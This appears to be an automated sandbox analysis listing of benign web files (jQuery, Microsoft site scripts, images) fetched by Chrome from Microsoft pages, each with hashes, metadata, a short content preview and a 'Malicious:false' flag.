                                                                                                                                                                                                          Preview:'use strict';window.ExpConsentUtils=window.ExpConsentUtils||{};window.ExpConsentUtils=function(){return{waitForObj:function(f){return new Promise(function(d,c){var h=0,k=setInterval(function(){100>h?"visitor"==f&&"object"===typeof visitor&&visitor||"consent"==f&&"undefined"!==typeof WcpConsent&&WcpConsent&&"undefined"!==typeof WcpConsent.siteConsent&&WcpConsent.siteConsent&&"undefined"!==typeof GPC_DataSharingOptIn&&null!=GPC_DataSharingOptIn?(clearInterval(k),d()):h++:(clearInterval(k),c())},50)})}}}();.var ExpConsentHandler=function(){function f(){window.ExpConsentUtils.waitForObj("visitor").then(function(){visitor.getVisitorValues(function(a){adobe.target.trackEvent({mbox:"personalizationConsent"})})}).catch(function(a){console.log(a)})}function d(){return WcpConsent&&WcpConsent.siteConsent&&void 0!==WcpConsent.siteConsent.isConsentRequired&&null!==WcpConsent.siteConsent.isConsentRequired?WcpConsent.siteConsent.isConsentRequired:!0}function c(){var a=WcpConsent&&WcpConsent.siteConse
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (15109), with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):15382
                                                                                                                                                                                                          Entropy (8bit):5.508812347355701
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ocEnBwu5N7/EH6S7e1SlQswbnWzOyphnV2pKAZoLv:nGf7/EL7+zWAZk
                                                                                                                                                                                                          MD5:BC5E72E8CE083D46ADB43848B3E75434
                                                                                                                                                                                                          SHA1:8E8EC43AF69CF3D5D7AA2C507A443893C1C77BB5
                                                                                                                                                                                                          SHA-256:4626C0FC01A26A8061936336C4A9F252B78C0272CE6BD1D4EE849985807355CE
                                                                                                                                                                                                          SHA-512:F21159BA8E45672E67E743927074433C5DB22DD7BB76F406D413AABC0A97A978C7256A4E344A9C5AFD12F57C2EE92374B115CE1074A6958FAC8A0D3394D57A99
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:/*! globalize - v0.1.0pre - 2012-10-18..* http://wiki.jqueryui.com/Globalize..* Copyright 2012 ; Licensed MIT */..(function(e,t){var n,r,i,s,o,u,a,f,l,c,h,p,d,v,m,g,y,b,w,E,S,x,T,N;n=function(e){return new n.prototype.init(e)},typeof require!="undefined"&&typeof exports!="undefined"&&typeof module!="undefined"?module.exports=n:e.Globalize=n,n.cultures={},n.prototype={constructor:n,init:function(e){return this.cultures=n.cultures,this.cultureSelector=e,this}},n.prototype.init.prototype=n.prototype,n.cultures["default"]={name:"en",englishName:"English",nativeName:"English",isRTL:!1,language:"en",numberFormat:{pattern:["-n"],decimals:2,",":",",".":".",groupSizes:[3],"+":"+","-":"-",NaN:"NaN",negativeInfinity:"-Infinity",positiveInfinity:"Infinity",percent:{pattern:["-n %","n %"],decimals:2,groupSizes:[3],",":",",".":".",symbol:"%"},currency:{pattern:["($n)","$n"],decimals:2,groupSizes:[3],",":",",".":".",symbol:"$"}},calendars:{standard:{name:"Gregorian_USEnglish","/":"/",":":":",firstDay
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65471)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):4004963
                                                                                                                                                                                                          Entropy (8bit):5.608526137357891
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:49152:AqDJZ0Df8/CxDmmu/nwEMPLkdvrCr82Ijcysknuhz1BjR1NYS01tQjmyi:mTPWHljyo
                                                                                                                                                                                                          MD5:B43015D52D9B94E96ED0014BEEC60073
                                                                                                                                                                                                          SHA1:4FF02D873DE449E83D0BD2E8CA0AEE0CCCEC2A5C
                                                                                                                                                                                                          SHA-256:74F25E06CA7E129830D80CE20633807EE402C2163B758A9642A1845C59CADB14
                                                                                                                                                                                                          SHA-512:CEEDE0683CCAEC41D0C203EAE939331F82C0265ACBCFB218476183423EA207BA3C06A1E49FE7D91D6CB1F860801D899255A3BAC3DF340A5B1F3A35B09B97D322
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://cdn.botframework.com/botframework-webchat/latest/webchat.js
                                                                                                                                                                                                          Preview:/*! For license information please see webchat.js.LICENSE.txt */.!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var r=t();for(var n in r)("object"==typeof exports?exports:e)[n]=r[n]}}(self,(function(){return function(){var e,t,r={37825:function(e,t,r){"use strict";var n=r(92412),i={childContextTypes:!0,contextType:!0,contextTypes:!0,defaultProps:!0,displayName:!0,getDefaultProps:!0,getDerivedStateFromError:!0,getDerivedStateFromProps:!0,mixins:!0,propTypes:!0,type:!0},o={name:!0,length:!0,prototype:!0,caller:!0,callee:!0,arguments:!0,arity:!0},a={$$typeof:!0,compare:!0,defaultProps:!0,displayName:!0,propTypes:!0,type:!0},s={};function c(e){return n.isMemo(e)?a:s[e.$$typeof]||i}s[n.ForwardRef]={$$typeof:!0,render:!0,defaultProps:!0,displayName:!0,propTypes:!0},s[n.Memo]=a;var u=Object.defineProperty,l=Object.getOwnPropertyNames,p=Object.getOwnPropertySymbols,d=Object.getOwnPropertyDes
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 129x128, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):736
                                                                                                                                                                                                          Entropy (8bit):7.67155770789133
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:o5vX5Vq/u2ajGL/kvQ4vqPz5Cb25PDQ7DHVW73F5tag2dGT1WZaIhNix1AuWGllG:cipajGLyQ4vqPVCGbQ7D07V5tMVZaqi6
                                                                                                                                                                                                          MD5:3F5283225D3AE6A00ECE6EBAF310D67C
                                                                                                                                                                                                          SHA1:8B657A5B0DF689215D25159231232B16E02C9173
                                                                                                                                                                                                          SHA-256:CD3CBBBC1008CB16D06C872910364A7F10B147164EEF3E22CB23D98CC20EECE3
                                                                                                                                                                                                          SHA-512:0D44DE1673B9C0CD028C4F3CAF1EF1BEA0802FA0C756EDF0C218B72BF28E5741239E7C92F96B5DD0A8AC3EDD2B70869C9D0F64A994E6CDC105823225B3A89B04
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:RIFF....WEBPVP8 .........*....>9..C.!..Y.. ....n.4.....].b.....s..k..._...d...}../.....?pO......nw .2.\(..<Z..^.$...vL....xy....6HH=.p.?.7..O..1%f].. ......I..#..>.F.#.kb......\D.....;.5..w.C..-..d...........+r...g).L."....'.......E).*...]......&.]....\.V,..m.J..{R..]..a..a.......l..V..:..?.{.....>DN.5...O$..qy.>...r...}{.p.,ZK.D _.$^.........X.Z...>..-.......o0....i..F6...{y.{._...p....#?. .K.....RU.?......^....tX.^.{....fKCvm.ik;^.A|.|....o|a.*3C...Q4..<..0...~..f.".~.N..J.Y.Y|lbz.q.l.1e...{.Y.n.'..fv..P.v..W.$.\....n....k..*6......i....C]..xe.`.$...g.\.?. .B..$.Y..}..p3.'.!..*....9...K...C..9.......%......-..\=._..........._.!.u.w.iM...5x....o)..A..'{..G.._...yN!....D$.rU...5........A......H....
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):71856
                                                                                                                                                                                                          Entropy (8bit):5.356840443190699
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:eaO7Fjr+JSuwEql+t0T/iCewxOrIpYQj8gnI:eaOR/GqPiCXOQj8gnI
                                                                                                                                                                                                          MD5:FA8D18D4C9B1197E8532E0288D7D0920
                                                                                                                                                                                                          SHA1:B0AD25DAEAD656E47C0AD2A4DCD3AD3D1B3D0CC9
                                                                                                                                                                                                          SHA-256:B9A27B2D489A112F5A3294771FA75DC9F7A39807355CAEE4BD06A8BAB2B03E89
                                                                                                                                                                                                          SHA-512:B7D7279A045C51EB8A58AEA9F769C95292A3E7959E9589E267C12DEB1C113FCB6A79C849D557143A84B44D731030F1283194F0A5DA930FE3B2F3DED343DB2FDC
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:var marker;this.parseTimeMarkers=this.parseTimeMarkers||{},(marker=this.parseTimeMarkers["polyfills.min.js"]||(this.parseTimeMarkers["polyfills.min.js"]={})).startEval=window.jsCommon&&window.jsCommon.performance&&window.jsCommon.performance.now?window.jsCommon.performance.now():Date.now(),window.perfTracking&&window.perfTracking.startBundleEval&&window.perfTracking.startBundleEval("polyfills.min.js"),function(){"use strict";var t={7573:function(){!function(t){var e=t.performance;function n(t){e&&e.mark&&e.mark(t)}function r(t,n){e&&e.measure&&e.measure(t,n)}n("Zone");var o=t.__Zone_symbol_prefix||"__zone_symbol__";function i(t){return o+t}var a=!0===t[i("forceDuplicateZoneCheck")];if(t.Zone){if(a||"function"!=typeof t.Zone.__symbol__)throw new Error("Zone already loaded.");return t.Zone}class s{static{this.__symbol__=i}static assertZonePatched(){if(t.Promise!==Z.ZoneAwarePromise)throw new Error("Zone.js has detected that ZoneAwarePromise `(window|global).Promise` has been overwritten.
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (889)
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):92962
                                                                                                                                                                                                          Entropy (8bit):5.482012211093105
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:wB4vGoYlmQr+IDv1Ty/6RsSz5TGF/46nNUgDbC03vu9FnHKDfa6Z/VUhdIKq6Tjv:wqxNrNG9FnHKD/oIKq6Tjv
                                                                                                                                                                                                          MD5:35986A813756F39AB6B922979FFEDB03
                                                                                                                                                                                                          SHA1:C8E2213BBAFAF535DA9C6676F3DBA43449E4D15A
                                                                                                                                                                                                          SHA-256:E2D92BDAAD925C6D355331A338384EE3FF82492352975DD4EFDA791AEF4AB3F5
                                                                                                                                                                                                          SHA-512:289F1C432E73F611D54EB1130013174174222A0C5EEF8E2464C5FD51EE33DC702326EEECA80B2AAE213DB2FCCB149297FC37CC9A0B6CF6E928A66BC27843F930
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:/*. jQuery JavaScript Library v3.5.1. https://jquery.com/.. Includes Sizzle.js. https://sizzlejs.com/.. Copyright JS Foundation and other contributors. Released under the MIT license. https://jquery.org/license.. Date: 2020-05-04T22:49Z. Sizzle CSS Selector Engine v2.3.5. https://sizzlejs.com/.. Copyright JS Foundation and other contributors. Released under the MIT license. https://js.foundation/.. Date: 2020-03-14.*/.'use strict';(function(H,Sa){"object"===typeof module&&"object"===typeof module.exports?module.exports=H.document?Sa(H,!0):function(Ta){if(!Ta.document)throw Error("jQuery requires a window with a document");return Sa(Ta)}:Sa(H)})("undefined"!==typeof window?window:this,function(H,Sa){function Ta(a,b,c){c=c||M;var d,f=c.createElement("script");f.text=a;if(b)for(d in Kc)(a=b[d]||b.getAttribute&&b.getAttribute(d))&&f.setAttribute(d,a);c.head.appendChild(f).parentNode.removeChild(f)}function Ia(a){return null==.a?a+"":"object"===typeof a||"function"===typeof a?db[Ob.call(a)]
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:C++ source, ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):697
                                                                                                                                                                                                          Entropy (8bit):4.9687589816244095
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:UHevFvKrbON5NtK/efIBbd/FqYT/ZTkAxtK/efb+RAd/FjDhQAThtK/efKXEnHz7:KWFNvs/ew//Fqu/ljxs/eD+R0/FjtQ+V
                                                                                                                                                                                                          MD5:D2F3218A374A1305FE262FC4BAEEDDD1
                                                                                                                                                                                                          SHA1:103721E516DC86A8EC433C6EA7C227BF7D954A55
                                                                                                                                                                                                          SHA-256:F76208F59F7E18EFB405361893B45B9DD7D0759BB5329AC664F39C02384982CD
                                                                                                                                                                                                          SHA-512:011062B7E77B5BBCACC6391C6E9873D4221E3474276F56D36EF29B78EA9E7C1C6C2021DA3D80D79C30E1675AC0CE62DC397C52051C7C1478054C02AF27BC7077
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:/**. * OneCloud environment constants class.. */.class OneCloudEnvironmentConstants {.. /**. * OneCloud data connector AEM publisher variables.. * @readonly. */. static DataConnector = Object.freeze({. "endpoint": "/msonecloudapi",. queryParams: {}. });.. /**. * Microsoft API Prod Endpoint. * @readonly. */. static MicrosoftAPI = Object.freeze({. "endpoint": "https://www.microsoft.com/msstoreapiprod". });.. /**. * Appsource Request Header. * @readonly. */. static AppsourceAPI = Object.freeze({. "header": "Njg1YmM2MWI1ZTA4MWVlMzAxZTQwM2YxMzk2MjU4YzljMDE3Nzc0NDM2MWMyMzg3MGQwZjMwYzIxZWY0ODMwMQ==". });.}
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):1976
                                                                                                                                                                                                          Entropy (8bit):4.4820518319503835
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:+cntsSY/J2UDI2sGulM/wlN1vq0GAg/QK0j2rQzMGuFiFmGIGuFrFmGdqs:PnOSYhJDIJlMolN1wv0/yUFYNFvqs
                                                                                                                                                                                                          MD5:106A6A519DAD38A935C4D5AA2786D6FB
                                                                                                                                                                                                          SHA1:3340ADF8A3220D92786A423BEED46092103C5D7D
                                                                                                                                                                                                          SHA-256:C0F462098BFAC577C182C3A983C6A35A5016A5EE96655CF7B57A46F70EAB83EF
                                                                                                                                                                                                          SHA-512:8F0E42976D0D5D362CECD6CDDBE3F1DC84BAC7149DBAA78C8787409EE4224D04E5FE8D68631799ABF3E2DFA04D97B87F9F93A9B3399632E15C135B527558273A
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/components/content/reimagine/atomic/accordion/v2/accordion/clientlibs/site.min.ACSHASH106a6a519dad38a935c4d5aa2786d6fb.js
                                                                                                                                                                                                          Preview:.(function (document) {. document.addEventListener("DOMContentLoaded", () => {. const attrElement = $(".ocr-accordion .btn-collapse");.. /**. * Data attributes for accordion elements.. * @typedef {Object} DataAttributes. * @property {string} off - Data attribute value when the element is collapsed.. * @property {string} on - Data attribute value when the element is not collapsed.. */. const dataAttributes = {. "bi-bhvr": { off: "7", on: "8" },. "bi-ct": { off: "Accordion Expend", on: "Accordion Collapse" },. };.. /**. * Update data attributes based on the collapse state.. * @param {Object} currentObj - Current collapse instance.. */. const updateDataAttribute = (currentObj) => {. const isCollapsed =. currentObj?.triggerElement.classList.contains("collapsed");.. Object.entries(dataAttributes).forEach(([attribute, values]) => {. const dataAttrValue = isCollapsed
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (655)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):476830
                                                                                                                                                                                                          Entropy (8bit):5.504913141773882
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6144:v+iJyDmVwNQbmAbm8aw+dBABTSO6VCMoouax2fpfJM2ib:vMgY58a+Sjgax28b
                                                                                                                                                                                                          MD5:48DD3E22F922821879E06AFDBBAE1B13
                                                                                                                                                                                                          SHA1:C9A299AB783C87C782F3C1C18ADC861486615F19
                                                                                                                                                                                                          SHA-256:40FBF03763120106011C15B2970BC3F8E3BCA1B58878E79CC3303E6B92496D31
                                                                                                                                                                                                          SHA-512:5F3ABC05096D0E691C248D18F44224F07D97F927B6C1DB1BC2D7F003A80BCD4377B2ECFA47A5F1DF4F061C13AF3E8E28F56F66FA6F41BC561A5EA144B91620E8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-reimagine/main-light.min.ACSHASH48dd3e22f922821879e06afdbbae1b13.js
                                                                                                                                                                                                          Preview:/*. OneCloud Reimagine v0.308.0. MWF (Moray) v2.8.1. Copyright (c) Microsoft Corporation. All rights reserved.. Copyright 2011-2020 The Bootstrap Authors and Twitter, Inc..*/.'use strict';(function(V,L){"object"===typeof exports&&"undefined"!==typeof module?L(exports):"function"===typeof define&&define.amd?define(["exports"],L):(V="undefined"!==typeof globalThis?globalThis:V||self,L(V.ocrReimagine={}))})(this,function(V){function L(){function b(x,w,y){return Object.defineProperty(x,w,{value:y,enumerable:!0,configurable:!0,writable:!0}),x[w]}function d(x,w,y,R){w=Object.create((w&&w.prototype instanceof c?w:c).prototype);R=new r(R||[]);return A(w,"_invoke",{value:k(x,y,.R)}),w}function a(x,w,y){try{return{type:"normal",arg:x.call(w,y)}}catch(R){return{type:"throw",arg:R}}}function c(){}function e(){}function f(){}function g(x){["next","throw","return"].forEach(function(w){b(x,w,function(y){return this._invoke(w,y)})})}function h(x,w){function y(E,wa,ja,Lb){E=a(x[E],x,wa);if("throw"!==E.
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (512)
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):544
                                                                                                                                                                                                          Entropy (8bit):5.221040627274746
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:Yz+uu8HDeNucEuKEZEuwdaXOVWMsk2lntX2F3/v2d7oyxCJNe:YauZStKa5nltX2Fvege
                                                                                                                                                                                                          MD5:383B23D12DF0D9265D7569A7102C2F96
                                                                                                                                                                                                          SHA1:B78FB17F58484F5CD29B3FE307936181E1B30B57
                                                                                                                                                                                                          SHA-256:BBF608E321107D6C4EEAF31A4A0EEB9DD8A9AB825F645FA963651688FD3D3914
                                                                                                                                                                                                          SHA-512:8CA27D482871CAFF41C2D86CA743F075ED97465C12624B1841396B423229A90AFB7E62211BB02DFC0211C45BBABFD12F82EFF8863E6FD3D176FCD99C84747F60
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:'use strict';(function(){(function(b){var a=document.createElement("iframe");a.setAttribute("src","https://fpt.microsoft.com/tags?session_id\x3d"+b);a.style.width="100px";a.style.height="100px";a.style.cssText="display: none; color: rgb(0,0,0); float:left; position:absolute; top:-200px; left:-200px; border:0px";a.title="greenID";a.setAttribute("id","greenID");document.body.append(a)})(function(){return"10000000-1000-4000-8000-100000000000".replace(/[018]/g,b=>(b^crypto.getRandomValues(new Uint8Array(1))[0]&.15>>b/4).toString(16))}())})();
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (17536), with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17536
                                                                                                                                                                                                          Entropy (8bit):5.379461730103927
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:BKnhudjjyi8RNG+FH09zOrxWPuA7sd1T4v4NW7ZDCceHMLTwjgaopvZRB:sn4xjypZFH09zOrqs74v4o7hOY3aoD
                                                                                                                                                                                                          MD5:FE11D7E120969836694262F7E9169389
                                                                                                                                                                                                          SHA1:2560E2950F469C9ED208A527C0120CB02EB7DDE9
                                                                                                                                                                                                          SHA-256:AD6B2F2C981407F321B42486884E2BD5A13943DDBA6EF4D313D5902092026D1C
                                                                                                                                                                                                          SHA-512:90602725B58D618FF891669FB2CF24BB986CE9960A130242D0A31B41735714FB0F0CAB3210E74A83908A791E6BCBE43A4309DD18090FFF431BD49AC0B8878049
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:"use strict";var marker;this.parseTimeMarkers=this.parseTimeMarkers||{},(marker=this.parseTimeMarkers["powerBISignOn.js"]||(this.parseTimeMarkers["powerBISignOn.js"]={})).startEval=window.jsCommon&&window.jsCommon.performance&&window.jsCommon.performance.now?window.jsCommon.performance.now():Date.now(),window.perfTracking&&window.perfTracking.startBundleEval&&window.perfTracking.startBundleEval("powerBISignOn.js"),function(){var l={d:function(r,n){for(var e in n)l.o(n,e)&&!l.o(r,e)&&Object.defineProperty(r,e,{enumerable:!0,get:n[e]})},o:function(r,n){return Object.prototype.hasOwnProperty.call(r,n)},r:function(r){typeof Symbol<"u"&&Symbol.toStringTag&&Object.defineProperty(r,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(r,"__esModule",{value:!0})}};!function(){if(typeof l<"u"){var r=l.u,n=l.e,e=new Map,t=new Map;l.u=function(i){return r(i)+(e.has(i)?"?"+e.get(i):"")},l.e=function(i){return n(i).catch(function(s){var o=t.has(i)?t.get(i):5;if(o<1){var u=r(i);throw s.message=
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (3336)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):114239
                                                                                                                                                                                                          Entropy (8bit):5.472407234338486
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:J0tWbQ0IWRSvwUTCU5W80mHxuxKdwdL4/aC9Mj1FWerIj9uVbxdu6Dx36HMEHmig:WWbQ0Iwp6WrmROd
                                                                                                                                                                                                          MD5:23622C68784B7E7D9033221BF9A3C4E2
                                                                                                                                                                                                          SHA1:C001B542F61A5F0BAB2B3D8ACAD1522EEAE32558
                                                                                                                                                                                                          SHA-256:52DCAB5BDAD615C37EF360BB3AD6B7257FFE61D8823F7E161F217709798B6DFD
                                                                                                                                                                                                          SHA-512:6D07A004E58F12B5EDBAA10F1898093ADF5BA3C60F29977B813E9333582781132B4B12EFDB32A3E5F5CEE0F585CDD6031549579F388464ABA97617CA079FBDCA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/msonecloudapi/assets/msocbody.js
                                                                                                                                                                                                          Preview:/*! 160368 */!function(e){let n="www.microsoft.com"!==window.location.hostname,i="https://go.microsoft.com/fwlink/p/?LinkID=",t={HERO:".highlight",ME_CONTROL_SIGN_IN:'#mectrl_main_trigger[href*="SignIn"]',SIGN_IN_LINK:'a[data-bi-bhvr="100"]',SIGN_UP_LINK:'a[data-bi-bhvr="210"]',UHF_SIGN_UP:"#c_shellmenu_signupforfree"},o,r=0,s;function a(){let e=document.querySelector(t.ME_CONTROL_SIGN_IN),i=document.querySelector(t.UHF_SIGN_UP);e||e&&i?(o.signIn&&e.setAttribute("href",o.signIn),o.signUp&&i.setAttribute("href",o.signUp),clearInterval(s),n&&console.log("UHF sign-in override loaded after "+r+" iterations.")):r>40&&(clearInterval(s),n&&console.log("UHF sign-in override skipped after "+r+" iterations.")),r++}function l(){(o=function o(){let r=document.querySelector(t.HERO),s,a;if(r){let l=r.querySelector(t.SIGN_IN_LINK),g=r.querySelector(t.SIGN_UP_LINK);l?s=l.getAttribute("href"):n&&console.log("No hero sign in link found."),g?a=g.getAttribute("href"):n&&console.log("No hero sign up link f
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4565
                                                                                                                                                                                                          Entropy (8bit):7.879534543139402
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:aSNKFuwJEQpaGX5wC3wglX5YEGdqsR1VsIAufA0E3xnMMV7:aSN3QpayvmEGdqsxsW7EhMMF
                                                                                                                                                                                                          MD5:D596565EC1F100A507CC0D5F663B6D57
                                                                                                                                                                                                          SHA1:6B688AA0541E5758B9A54C1848C6A52886E081BA
                                                                                                                                                                                                          SHA-256:4C8A06620DD3AADE66AEB759A5FC2BCEC1B51B66EA9C456B5DC3F511CB783258
                                                                                                                                                                                                          SHA-512:7E7CAF2644B686064959389EA975BC1701C8FB3FB23C44B701FE710227FE2A0A0B58769AABA6569FCBE1D79E44E5669CD60036060B3144E0C6B97A8C40D6CA9B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............J.......pHYs.................IDATx...t..u...H.$~X.....|L16.8@........`p.&.,..+.mPKh....4)$$.H..+Y....?SB.l.1..H!.4....c+..-k...cf.....Z.bZ......f..w.}.=.}...*...o....G.t%.?C...SOV.n..r!.t.<<.?.)..G......x...QA<... ..yxT..@w...Jkk..t:=....8....a.w..t)ux.v.......3TU}...........4.Z..@D.\...O.......<....\J).<......u.$..^.!.rfV.y},.[....a.....Q+..d...i...9..=..iU..S"ZY$[...&..1......9r"..........O.R..h..n..B...*X2..OD.,..n.4..]..k<.{..K..)...J.oB)...<.}>..6.o.~..X!.W..3s..,.<.Rj;DDg..........B\....;`..N...=1....L&.2...X,.z&m.)X1|.|9.`B.K`..K...u.K)7.o...CQ.9.|.C<....b......DD..] .\b....@0...d..s..X....0.S...2uuu.&..C.......O=..O..4-..+..ttt.+WV3......L......f.\..\......dr!.....[o.u_SSS...a.a..B....?.n.8.O.f.N...+....c}2O....p8.www..)b....D.........s4..~z..!.tQ...\........2{3X.o........OK$.'..}.M.f.8..c..DT....Kl.);\.=.;::d.2.v..RN.p..Bef.(.G.tz{<..QJ[.....1W.X1Y.1.....]......<....H.0&..~..y..(.E".wK..........G2.".L..
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):89501
                                                                                                                                                                                                          Entropy (8bit):5.289893677458563
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                                                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (566)
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):61208
                                                                                                                                                                                                          Entropy (8bit):5.486865205392623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:qCLbrNurYZRrfHvWCOqbEC9EbivVZh3ctWNwtBSg646z:qC/purwhfPWCOqbEC9EG3sDP6z
                                                                                                                                                                                                          MD5:F381D5147C85EE687EA8FBEF32C83D37
                                                                                                                                                                                                          SHA1:EB654ABAF1DF5CCB830763D5A40140B5C093C49F
                                                                                                                                                                                                          SHA-256:2D0832B29F1B3347C4B5046C373A635884B76ABAF2DE3FF650EE74D8B46F001E
                                                                                                                                                                                                          SHA-512:CD6B4DEB925037A6C0CF4BAA5AB600891139D99BFB9173D3F3DD4660D281A6266B5709D53770395E7459D9D2060E37F06295E8F9719A21F3EA8433D9E2206E65
                                                                                                                                                                                                          Malicious:false
